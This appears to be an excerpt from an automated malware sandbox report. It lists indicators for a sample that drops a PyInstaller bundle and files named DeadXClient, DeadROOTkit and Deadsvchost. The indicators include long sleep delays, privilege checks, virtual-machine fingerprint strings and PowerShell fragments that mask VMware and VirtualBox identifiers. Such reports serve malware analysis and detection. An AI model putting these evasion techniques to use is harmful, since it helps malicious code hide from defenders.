                        Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 834
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\_decimal.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\_hashlib.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\python3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\_ssl.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\_lzma.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\_ctypes.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\python311.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\_cffi_backend.cp311-win_amd64.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\_socket.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\_bz2.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\_queue.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\unicodedata.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\select.pydJump to dropped file
                        Source: C:\Users\Public\DeadXClient.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_6-11240
                        Source: C:\Users\Public\DeadCodeRootKit.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-18574
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeAPI coverage: 7.6 %
                        Source: C:\Users\Public\DeadXClient.exeAPI coverage: 0.3 %
                        Source: C:\Users\user\AppData\Local\Temp\1.exe TID: 6104Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\Public\DeadXClient.exe TID: 4836Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\Public\DeadXClient.exe TID: 5876Thread sleep count: 5206 > 30Jump to behavior
                        Source: C:\Users\Public\DeadXClient.exe TID: 5876Thread sleep count: 4625 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1220Thread sleep count: 4234 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1220Thread sleep count: 4440 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5684Thread sleep time: -7378697629483816s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3892Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 4632Thread sleep count: 72 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 4632Thread sleep time: -72000s >= -30000s
                        Source: C:\Users\Public\Deadsvchost.exe TID: 6764Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\dllhost.exe TID: 616Thread sleep count: 488 > 30
                        Source: C:\Windows\System32\dllhost.exe TID: 616Thread sleep time: -48800s >= -30000s
                        Source: C:\Windows\System32\dllhost.exe TID: 4832Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\winlogon.exe TID: 2016Thread sleep count: 9986 > 30
                        Source: C:\Windows\System32\winlogon.exe TID: 2016Thread sleep time: -9986000s >= -30000s
                        Source: C:\Windows\System32\lsass.exe TID: 988Thread sleep count: 9948 > 30
                        Source: C:\Windows\System32\lsass.exe TID: 988Thread sleep time: -9948000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 6828Thread sleep count: 262 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 6828Thread sleep time: -262000s >= -30000s
                        Source: C:\Users\Public\Deadsvchost.exe TID: 3180Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\dwm.exe TID: 7012Thread sleep count: 9870 > 30
                        Source: C:\Windows\System32\dwm.exe TID: 7012Thread sleep time: -9870000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 6452Thread sleep count: 251 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 6452Thread sleep time: -251000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 5716Thread sleep count: 252 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 5716Thread sleep time: -252000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 5140Thread sleep count: 240 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 5140Thread sleep time: -240000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 3816Thread sleep count: 238 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 3816Thread sleep time: -238000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 2548Thread sleep count: 200 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 2548Thread sleep time: -200000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 6248Thread sleep count: 250 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 6248Thread sleep time: -250000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 6408Thread sleep count: 235 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 6408Thread sleep time: -235000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 6724Thread sleep count: 245 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 6724Thread sleep time: -245000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 2784Thread sleep count: 249 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 2784Thread sleep time: -249000s >= -30000s
                        Source: C:\Users\Public\Deadsvchost.exe TID: 640Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 948Thread sleep count: 243 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 948Thread sleep time: -243000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 5072Thread sleep count: 246 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 5072Thread sleep time: -246000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 4044Thread sleep count: 251 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 4044Thread sleep time: -251000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 4068Thread sleep count: 119 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 4068Thread sleep time: -119000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 6852Thread sleep count: 251 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 6852Thread sleep time: -251000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 5396Thread sleep count: 249 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 5396Thread sleep time: -249000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 1880Thread sleep count: 251 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 1880Thread sleep time: -251000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 4160Thread sleep count: 251 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 4160Thread sleep time: -251000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 6400Thread sleep count: 245 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 6400Thread sleep time: -245000s >= -30000s
                        Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 7000Thread sleep count: 1810 > 30
                        Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 7000Thread sleep count: 834 > 30
                        Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 7000Thread sleep count: 241 > 30
                        Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 7000Thread sleep count: 154 > 30
                        Source: C:\Users\Public\DeadROOTkit.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
                        Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Users\Public\DeadXClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\Public\Deadsvchost.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\Public\Deadsvchost.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\Public\Deadsvchost.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABE6B80 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF6FABE6B80
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABE76F0 FindFirstFileExW,FindClose,2_2_00007FF6FABE76F0
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FAC01674 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF6FAC01674
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABE76F0 FindFirstFileExW,FindClose,5_2_00007FF6FABE76F0
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABE6B80 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00007FF6FABE6B80
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FAC01674 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00007FF6FAC01674
                        Source: C:\Users\Public\DeadXClient.exeCode function: 6_2_1C59BF5C FindFirstFileExW,6_2_1C59BF5C
                        Source: C:\Users\user\AppData\Local\Temp\1.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\Public\DeadXClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\Public\Deadsvchost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\Public\Deadsvchost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\Public\Deadsvchost.exeThread delayed: delay time: 922337203685477
                        Source: CMaker 2.0.exe, 00000005.00000003.2172273654.0000022D34DCB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231869727.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2171930276.0000022D34DCB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172905632.0000022D34DCB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2222507577.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176753865.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175839153.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229086639.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2171387062.0000022D34DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWu
                        Source: CMaker 2.0.exe, 00000002.00000003.2155583586.00000218C017E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
                        Source: dwm.exe, 00000017.00000002.3518000549.000001D156AA0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000gB
                        Source: svchost.exe, 0000001E.00000000.2403096584.0000022E66A2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
                        Source: lsass.exe, 00000014.00000000.2323428537.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
                        Source: svchost.exe, 0000001E.00000002.3475897795.0000022E66A43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmci
                        Source: svchost.exe, 0000001E.00000000.2404096640.0000022E67512000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                        Source: DeadXClient.exe, 00000006.00000002.3500000088.000000001BE30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWe="5%SystemRoot%\system32\mswsock.dll <section name="roleService" type="System.Web.Configuration.ScriptingRoleServiceSection, System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" requirePermission="false" allowDefinition="MachineToApplication" />
                        Source: svchost.exe, 0000001C.00000002.3501926907.00000200A2218000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
                        Source: svchost.exe, 0000001E.00000000.2404096640.0000022E67512000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD00
                        Source: svchost.exe, 0000001E.00000000.2403457523.0000022E67060000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: D8VMwareVirtual disk6000c29c2bea38880a8a16ee9f37bec9
                        Source: svchost.exe, 0000001E.00000000.2404096640.0000022E67512000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                        Source: svchost.exe, 0000001E.00000003.2482259460.0000022E6758D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
                        Source: svchost.exe, 0000001E.00000003.2483947447.0000022E67B9C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>Wi(
                        Source: svchost.exe, 0000001E.00000000.2404308338.0000022E6759C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
                        Source: svchost.exe, 0000001E.00000000.2404096640.0000022E67512000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: storahciNECVMWarVMware SATA CD00
                        Source: svchost.exe, 0000001E.00000003.2488059503.0000022E67DB9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
                        Source: svchost.exe, 0000001E.00000000.2404308338.0000022E67584000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
                        Source: svchost.exe, 0000001E.00000000.2403486929.0000022E67080000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
                        Source: svchost.exe, 0000001E.00000003.2482259460.0000022E6758D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: D8VMwareVirtual disk6000c29c2bea38880a8a16ee9f37bec98
                        Source: lsass.exe, 00000014.00000000.2323027145.000002D6F0613000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3470341040.000002D6F0613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.3465391110.0000014E41C13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.2339134354.0000014E41C13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2373968108.0000023C9FE2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3471607558.0000023C9FE2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.3466071169.000001A1CA02A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.2376015772.000001A1CA02A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001C.00000000.2380874751.00000200A1241000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.3474707220.00000200A1241000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001E.00000000.2403170166.0000022E66A43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: svchost.exe, 0000001E.00000000.2404096640.0000022E67512000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LSI_SASVMware Virtual disk 6000c29c2bea38880a8a16ee9f37bec9
                        Source: svchost.exe, 00000015.00000000.2339134354.0000014E41C13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                        Source: svchost.exe, 0000001E.00000002.3477490370.0000022E66A94000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMCI: Using capabilities (0x1c).
                        Source: lsass.exe, 00000014.00000000.2323428537.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
                        Source: svchost.exe, 0000001E.00000000.2403486929.0000022E67080000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
                        Source: svchost.exe, 0000001E.00000003.2488059503.0000022E67DB9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c29c2bea38880a8a16ee9f37bec9PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
                        Source: DeadROOTkit.exe, 00000007.00000002.2316235027.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                        Source: svchost.exe, 0000001E.00000000.2404096640.0000022E67512000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicNECVMWarVMware SATA CD00
                        Source: aoKTzGQSRP.exe, 00000000.00000002.2154040312.0000000000FEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_
                        Source: svchost.exe, 0000001E.00000000.2404308338.0000022E67584000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
                        Source: svchost.exe, 0000001E.00000000.2403486929.0000022E67080000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
                        Source: svchost.exe, 0000001E.00000000.2404096640.0000022E67512000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                        Source: lsass.exe, 00000014.00000000.2325649964.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMWare
                        Source: svchost.exe, 0000001A.00000002.3464540581.000001A1CA000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                        Source: DeadXClient.exe, 00000006.00000002.3500000088.000000001BE30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW =
                        Source: lsass.exe, 00000014.00000000.2323428537.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
                        Source: svchost.exe, 0000001E.00000000.2404016134.0000022E6747B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmciAP<
                        Source: svchost.exe, 0000001E.00000003.2488059503.0000022E67DB9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware
                        Source: svchost.exe, 0000001E.00000002.3512000158.0000022E67B8C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                        Source: svchost.exe, 0000001E.00000000.2403486929.0000022E67080000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
                        Source: svchost.exe, 0000001E.00000000.2404096640.0000022E67512000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c29c2bea38880a8a16ee9f37bec9
                        Source: svchost.exe, 0000001E.00000000.2403486929.0000022E67080000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
                        Source: dwm.exe, 00000017.00000002.3518000549.000001D156B0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                        Source: svchost.exe, 0000001E.00000000.2404308338.0000022E6759C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c29c2bea38880a8a16ee9f37bec9PCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
                        Source: DeadROOTkit.exe, 00000007.00000002.2317533025.000000001BE00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllHH
